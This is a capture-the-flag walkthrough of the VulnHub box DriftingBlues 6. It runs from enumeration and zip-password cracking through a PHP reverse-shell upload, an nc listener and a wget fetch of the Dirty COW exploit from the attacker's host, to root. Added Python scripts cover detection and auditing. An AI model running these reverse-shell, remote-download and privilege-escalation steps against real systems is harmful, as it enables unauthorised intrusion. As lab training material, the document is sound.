Vulnhub walkthrough : Driftingblues 6

Akshay Trimukhe
6 min read · Apr 21, 2021

Hello, today we are going to solve a VulnHub machine called DriftingBlues: 6. You can download the box from here. It is an easy VulnHub box. The credit for the lab goes to tasiyanci. Let's get started and learn how to break it down successfully.

Import the VulnHub machine into VirtualBox or VMware and boot it.

Open a terminal and find its IP address by typing:

sudo netdiscover

Here we have found our target machine's IP address. Let's search for open ports with the nmap tool. Command:

sudo nmap -sC -sV -O -oN nmap.txt 192.168.1.22

So, from the nmap scan we have found that the target's operating system is Linux and that port 80 is open, with an HTTP service running on it. Open a browser and type the IP address into the URL bar. We get a page like this:

It gives us a message telling us not to hack them; the image does not have any message hidden in it. I looked at the source code: there is a comment at the bottom, but it is not useful. You can check it out for yourself.

As the nmap scan detected an entry in robots.txt, I went to /robots.txt, where we have one disallowed entry and one interesting hint.

Clearly the author is telling us to add the .zip extension while doing directory brute-forcing, so let's follow the hint. I went to the disallowed entry and found the login window of Textpattern CMS.

We don't have credentials to log in, so let's run gobuster to find some directories. Command:

gobuster dir -u http://192.168.1.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip

We found a spammer.zip file. Let's download it to our local system. I downloaded the file, but it is encrypted and we don't have the password to extract it, so I used the fcrackzip tool to find the password for spammer.zip. Command:

fcrackzip -u -D -p /home/dark/Desktop/rockyou.txt spammer.zip

I found the password for the file: myspace4. After extracting it, I found a cred.txt file containing the credentials mayern:lionheart for the Textpattern CMS login. I logged in to the application, and at the bottom of the page I found the Textpattern version.

It was running version 4.8.3. After searching for this version in searchsploit, I found that it is vulnerable to authenticated remote code execution. Command:

searchsploit textpattern

I don't know why, but for me the exploit did not work. So I started manually searching for a vulnerability and found a Files section where I can upload a file, so I uploaded a PHP reverse shell. You will find one at /usr/share/webshells/php/php-reverse-shell.php. I copied it to my /home/dark/Desktop/vulnhub/driftingblues6 directory. To change the script a little, type:

sudo nano php-reverse-shell.php

Change the ip and port variables. In the ip variable, put your attacker machine's IP address; you can find it by typing:

ifconfig

Then I uploaded php-reverse-shell.php to the application.

Now we have to run the script, but first we have to find the path where it was uploaded in the application. I ran a dirb scan to find directories in the application. Command:

dirb http://192.168.1.22/textpattern/

I found a /files directory in the application. I opened the URL in the browser and it contains our php-reverse-shell file. To get a reverse shell, first run netcat on your machine by typing:

nc -lvnp 1234

Here 1234 is the port number I set in the php-reverse-shell script.

Now netcat is listening on port 1234 and it's time to run our script, so I opened the reverse shell file in the browser. Hurray, I got a reverse shell.
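Two things made this foothold possible: an archive with credentials (spammer.zip) sitting in the document root, and an upload directory (/textpattern/files) that serves PHP files back as executable code. The following audit script is an added example written from the defender's side, not code from this walkthrough or from the Textpattern project; it walks a document root, flags archive or backup files reachable from the web, and flags files in the upload directory that contain PHP code even when their extension says otherwise. The directory layout, file names and contents it builds are constructed for the demo; the upload directory name is assumed from the path used on this box.

```python
"""Audit a web document root for the two exposures seen in this walkthrough:
archive/backup files served from the docroot and PHP code in an upload
directory.  Added example; every path and file body below is constructed."""
import os
import re
import tempfile

ARCHIVE_EXTS = {".zip", ".tar", ".gz", ".tgz", ".bak", ".sql", ".7z", ".rar"}
# PHP markers are matched on content, not extension, so a renamed upload is still caught
PHP_MARKERS = re.compile(rb"<\?php|<\?=", re.IGNORECASE)

def scan_docroot(docroot, upload_dirs=("textpattern/files",)):
    """Return a sorted list of (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if ext in ARCHIVE_EXTS:
                findings.append((rel, "archive/backup file reachable from docroot"))
            in_upload_dir = any(rel.startswith(u.rstrip("/") + "/") for u in upload_dirs)
            if in_upload_dir:
                with open(full, "rb") as fh:
                    head = fh.read(64 * 1024)   # enough to catch a marker near the top
                if ext == ".php" or PHP_MARKERS.search(head):
                    findings.append((rel, "PHP code in upload directory"))
    return sorted(findings)

def build_demo_docroot():
    """Create a constructed docroot mirroring the layout described in the walkthrough."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.makedirs(os.path.join(root, "textpattern", "files"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>do not hack us</body></html>")
    with open(os.path.join(root, "spammer.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04constructed-zip-bytes")          # constructed, not a real archive
    with open(os.path.join(root, "textpattern", "files", "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\nconstructed")                # benign upload
    with open(os.path.join(root, "textpattern", "files", "photo.jpg"), "wb") as fh:
        fh.write(b"<?php echo 'constructed marker'; ?>")        # PHP hiding behind an image name
    return root

if __name__ == "__main__":
    for path, reason in scan_docroot(build_demo_docroot()):
        print(f"{reason}: {path}")
```

Fixing the second finding is a server configuration matter rather than a file cleanup: the upload directory should never be handed to the PHP interpreter (with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for it), so a file that reaches it is served as bytes, not executed.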

Let's use the Python one-liner to upgrade it to a proper TTY shell. Type:

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Now we have a proper TTY shell.
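Everything up to this point left a clear trail in the web server's access log: a burst of 404s from one client while gobuster and dirb guessed paths, a hit on the .zip, and finally a GET for a .php file under the upload directory. The detector below is an added example, not part of this walkthrough or of any tool it uses; it parses Apache combined-format lines, counts 404s per client, and flags any request that executes a .php file from the upload directory. The log lines are constructed for the demo (the client address reuses the attacker address from this write-up; timestamps and sizes are made up), and the upload directory prefix is assumed from the path used on this box.

```python
"""Flag directory enumeration and PHP execution from an upload directory in
Apache combined-format access logs.  Added example with constructed log lines."""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_DIRS = ("/textpattern/files/",)   # assumed from the path used on this box

# Constructed sample log: not captured from the target machine
SAMPLE_LOG = """\
192.168.1.19 - - [21/Apr/2021:10:01:01 +0000] "GET / HTTP/1.1" 200 512
192.168.1.19 - - [21/Apr/2021:10:01:02 +0000] "GET /robots.txt HTTP/1.1" 200 88
192.168.1.19 - - [21/Apr/2021:10:02:10 +0000] "GET /admin.zip HTTP/1.1" 404 209
192.168.1.19 - - [21/Apr/2021:10:02:10 +0000] "GET /backup.zip HTTP/1.1" 404 209
192.168.1.19 - - [21/Apr/2021:10:02:11 +0000] "GET /test.zip HTTP/1.1" 404 209
192.168.1.19 - - [21/Apr/2021:10:02:11 +0000] "GET /old.zip HTTP/1.1" 404 209
192.168.1.19 - - [21/Apr/2021:10:02:12 +0000] "GET /spammer.zip HTTP/1.1" 200 1337
192.168.1.50 - - [21/Apr/2021:10:05:00 +0000] "GET /textpattern/files/logo.png HTTP/1.1" 200 4096
192.168.1.19 - - [21/Apr/2021:10:09:30 +0000] "GET /textpattern/files/php-reverse-shell.php HTTP/1.1" 200 0
"""

def parse(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text, not_found_threshold=4):
    """Return a list of (client_ip, alert) tuples.

    not_found_threshold is the number of 404s from one client that counts as enumeration.
    """
    alerts = []
    not_found = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        path = rec["path"].split("?", 1)[0].lower()
        if any(path.startswith(d) for d in UPLOAD_DIRS) and path.endswith(".php"):
            alerts.append((rec["ip"], f"php executed from upload dir: {rec['path']}"))
    for ip, n in not_found.items():
        if n >= not_found_threshold:
            alerts.append((ip, f"{n} x 404: possible directory enumeration"))
    return alerts

if __name__ == "__main__":
    for ip, msg in detect(SAMPLE_LOG):
        print(f"{ip}: {msg}")
```

The 404 threshold is deliberately low for the tiny sample; on a real server it should be tuned per time window so that a broken link in a page does not trip it, while a wordlist scan of thousands of paths still does.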

PRIVILEGE ESCALATION

Now we are in the driftingblues6 machine, but we are not the root user. Let's escalate.

Let's find out about the system. Type:

uname -a

So the Linux kernel version is 3.2.0. Let's look for a kernel exploit by searching on Google. We found a famous kernel exploit on Exploit-DB.

Let's download the exploit to our local system. It's time to transfer it to the compromised system.

Let's move to the /tmp directory on the compromised machine. I started a Python web server on my local machine by typing:

python -m SimpleHTTPServer

Download the exploit on the compromised system by typing:

wget http://192.168.1.19:8000/40839.c

You can learn how to compile and use this exploit by simply typing:

cat 40839.c

To compile the exploit, type:

gcc -pthread 40839.c -o dirty -lcrypt

Give the file executable permission by typing:

chmod +x dirty

Now it's time to run the dirty binary. Simply type:

./dirty

Now it will ask you to enter a password. Type one, and remember it.

After you type the password, the exploit runs; it takes a few minutes to complete. Then type:

su firefart

and enter the password you gave earlier. AAAAnnDDD BIINGGoo, you are now the user firefart, which has root privileges.

Simply type:

id

HUURRAAYY!!!!!!! We have root permissions! Now simply go to the /root folder and you will find the flag.txt file in it. To view it, simply type cat flag.txt.
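The firefart account exists because 40839.c is the Dirty COW exploit (CVE-2016-5195): it rewrites the root line of /etc/passwd into a new uid-0 user named firefart with the password hash stored inline, and keeps a copy of the original at /tmp/passwd.bak. Both facts give an incident responder something concrete to check. The audit below is an added example from the defender's side, not code from this walkthrough or from the exploit; it parses a passwd image, reports any uid-0 account other than root, any missing root account, any hash stored in passwd instead of shadow, and whether the exploit's backup file is present. The passwd contents are constructed to match what the exploit produces, not copied from the box.

```python
"""Audit an /etc/passwd image for the tampering Dirty COW (40839.c) leaves
behind.  Added example; the passwd contents below are constructed."""
import os

# Constructed /etc/passwd as it looks after the exploit ran: root line replaced by firefart
TAMPERED_PASSWD = """\
firefart:$6$constructedsalt$constructedhash:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""

# Constructed healthy file for comparison
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""

def parse_passwd(text):
    """Split passwd text into dicts; lines without exactly 7 fields are marked malformed."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": n, "name": line, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": n, "name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell, "malformed": False})
    return entries

def audit_passwd(text):
    """Return a list of finding strings; an empty list means the file looks sane."""
    findings = []
    entries = parse_passwd(text)
    names = [e["name"] for e in entries if not e["malformed"]]
    if "root" not in names:
        findings.append("no 'root' account present")
    for e in entries:
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"line {e['line']}: extra uid-0 account '{e['name']}'")
        # A real hash in field 2 means the account bypasses /etc/shadow entirely
        if e["pw"] not in ("x", "*", "!", ""):
            findings.append(f"line {e['line']}: password hash in passwd for '{e['name']}'")
    return findings

def backup_artifact_present(path="/tmp/passwd.bak"):
    """True if the backup the exploit writes before overwriting /etc/passwd still exists."""
    return os.path.exists(path)

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_PASSWD), ("tampered", TAMPERED_PASSWD)):
        print(label, audit_passwd(text) or "OK")
    print("backup artifact:", backup_artifact_present())
```

Recovery on a box hit this way is restoring the backup over /etc/passwd, then patching the kernel; leaving the firefart line in place keeps a second root login open for anyone who learns the password.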

Thanks for reading this article, keep hacking, keep learning :)
